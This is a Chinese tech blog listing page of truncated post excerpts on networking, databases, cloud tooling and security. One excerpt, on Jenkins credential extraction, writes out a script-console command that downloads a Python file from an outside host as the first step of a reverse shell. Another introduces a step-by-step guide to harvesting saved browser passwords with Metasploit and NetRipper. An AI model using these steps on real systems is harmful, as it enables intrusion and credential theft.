标签:TCP

博主自留地

TCP 协议简介

13

Harries 发布于 2018-04-26

TCP 是互联网核心协议之一,本文介绍它的基础知识。 一、TCP 协议的作用 互联网由一整套协议构成。TCP 只是其中的一层,有着自己的分工。 (图片说明:TCP 是以太网协议和 IP 协议的上层协议,也是应用层协议的下层协议。) 最底层的以太网协议(Ethernet)规定了电子...

阅读(6)评论(0)赞 (0)

Java

Jenkins凭证提取

1

xirruiqiang 发布于 2018-04-26

入口 碰到Jenkins未授权并且拥有Overall/RunScripts权限时可以在Script页面执行命令反弹Shell: println "wget http://www.rinige.com/back.py -P /tmp/".execute().te...

阅读(15)评论(0)赞 (0)

Java

Weblogic 反序列化漏洞(CVE-2018-2628)漫谈

9

yanxinchi 发布于 2018-04-25

作者:Badcode@知道创宇404实验室 漏洞简介 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下...

阅读(17)评论(0)赞 (0)

Java

WebLogic反序列化漏洞CVE-2018-2628复现与EXP构造

15

尖兵 发布于 2018-04-25

*本文原创作者:TopScrew,属于FreeBuf原创奖励计划,未经许可禁止转载 漏洞概要 Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可导致远程代码执行漏洞,漏洞威胁等级为高危,对应的CV...

阅读(11)评论(0)赞 (0)

Java

Servlet和JSP总结

2

xirruiqiang 发布于 2018-04-24

BS: Browser Server 浏览器和服务器 特点: 跨平台,功能升级比较方便,加载数据慢,用户体验稍差 CS: Client Server 客户端和服务器 特点: 功能升级 需要下载新版本客户端,用户交互界面炫酷,体验度高,需要开发多个平台的版本,开发成本高 总结: 两...

阅读(22)评论(0)赞 (0)

Java

Weblogic 反序列化REC(CVE-2018-2628)

2

xirruiqiang 发布于 2018-04-24

Weblogic简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能...

阅读(20)评论(0)赞 (0)

编程技术

redis 实战分析

dulong 发布于 2018-04-24

简介 后台开发日新月异,各种高高能高挑战!~~~ 例如:数据高并发的读写、海量数据的读写、对扩展性要求高的数据,要怎么操作达到性能最大化?分布式架构,如何做session共享?等等一些列问题困惑着前进的步伐… redis 入门 redis 是 单进程 单进程模型来处理客户端的请求...

阅读(23)评论(0)赞 (0)

编程技术

将项目迁移到Kubernetes上的5个诀窍

zhuangli 发布于 2018-04-24

我们将在本文中提供5个诀窍帮你将项目迁移到Kubernetes上,这些诀窍来源于过去12个月中OpenFaas社区的经验。下文的内容与Kubernetes 1.8兼容,并且已经应用于 OpenFaaS – Serverless Functions Made Simpl...

阅读(10)评论(0)赞 (0)

编程技术

号称十倍性能于 Cassandra 的 ScyllaDB,究竟祭出了哪些技术 “利器”?

5

changyuan.xu 发布于 2018-04-24

将一种现行流行的技术,换一种语言来重写,多以失败告终,但用C++重写Cassandra的ScyllaDB可谓是一个成功的典范。基于Seastar的ScyllaDB,能够很好的发挥新型硬件的优势,这是ScyllaDB性能有质的突破的一大重要原因。 Benchmark 先来看看Scy...

阅读(10)评论(0)赞 (0)

编程技术

使用 Envoy 作为前端代理

1

yanxinchi 发布于 2018-04-22

Envoy 是一款由 Lyft 开源的,使用 C++ 编写的 L7 代理和通信总线,目前是 CNCF 旗下的开源项目,代码托管在 GitHub 上,它也是 Istio service mesh 中默认的 data plane。本文将给出使用 Envoy 作为 service me...

阅读(36)评论(0)赞 (0)

编程技术

调用jscript引擎接口的malware分析

3

dulong 发布于 2018-04-22

int __cdecl main(int argc, const char argv, const char envp) { JSEngine v3 ; // ST20_4 JSEngine v4 ; // ST18_4 unsigned int i ; // [esp+1Ch]...

阅读(29)评论(0)赞 (0)

编程技术

Apache Common Pool2 对象池应用浅析

6

darida 发布于 2018-04-21

作者 | 乔宇 杏仁后端工程师,关注服务端技术。 我们系统中一般都会存在很多可重用并长期使用的对象,比如线程、TCP 连接、数据库连接等。虽然我们可以简单的在使用这些对象时进行创建、使用结束后销毁,但初始化和销毁对象的操作会造成一些资源消耗。我们可以使用对象池将这些对象集中管理,...

阅读(34)评论(0)赞 (0)

编程技术

浅析加密DNS(附子域名爆破工具)

1

wenming.gapo 发布于 2018-04-20

本文章简单介绍一下两种加密DNS协议:DNS over HTTPS 和 DNS over TLS。这两种协议主要为了解决DNS带来的隐私和中间人篡改问题。 0×01 DNS的安全及隐私 DNS设计之初并没有考虑安全问题,所以大部分DNS查询使用UDP传输,当然也可以用...

阅读(24)评论(0)赞 (0)

编程技术

程序员也追风口:区块链开发范式

1

邓龙华 发布于 2018-04-19

编者按:区块链的火爆让很多人都跃跃欲试。 YC在其博客上发布了一篇文章 指出,区块链将会带来开发范式的转变,并且给出了应对这一范式转变的操作建议。 引言 如果你点开了这篇文章,我们就假设你是一个对区块链感兴趣的开发者/黑客。你确信你能理解它的工作原理,现在你想要搞清楚区块链对你和...

阅读(44)评论(0)赞 (0)

IOS技术

美团iOS面试败北感悟

26

xirruiqiang 发布于 2018-04-19

GitHub Repo:coderZsq.target.swift Follow: coderZsq · GitHub Resume: coderzsq.github.io/coderZsq.we… 日常扯淡 从去年开始, 我就一直有尝试的面试些大公司, 因为对于一个半路出家(非...

阅读(52)评论(0)赞 (0)

编程技术

Metasploit+NetRipper获取Chrome等浏览器帐号密码测试

23

Harries 发布于 2018-04-19

前言 本篇文章我将手把手教会各位Buffer如何使用Metasploit+NetRipper获取Chrome等浏览器内保存的帐号密码。 需要工具: Kali Linux&Metasploit NetRipper 1.下载并且配置NetRipper git clone ht...

阅读(28)评论(0)赞 (0)

编程技术

Go语言的美好和丑陋

3

hellas 发布于 2018-04-19

这是一个“ Go不好 ”系列的额外文章。Go确实有一些不错的特性,也就是本文中“好的”部分,但是当我们不使用API或者网络服务器(这是为它设计的)而且将它用于业务领域逻辑的时候,总体而言我发现它用起来笨重且糟糕。但是即使在用于网络编程的时候,在设计和实现方面它也有很多缺陷,这导致...

阅读(28)评论(0)赞 (0)

编程技术

自用Linux版学习用品分享

yeseng 发布于 2018-04-19

由于自己是个Linux Lover,自从用上了kali,就和windows下很多学习用品无缘了,所以只能用一些同功能的替代用品来丰富一下kali linux 系统自带。 在逐渐摸坑的日子里,搜集了一些常用的学习用品。学习用品仅为学习用途,请勿用于非法用途。 学习用品都为搜集而来,...

阅读(32)评论(0)赞 (0)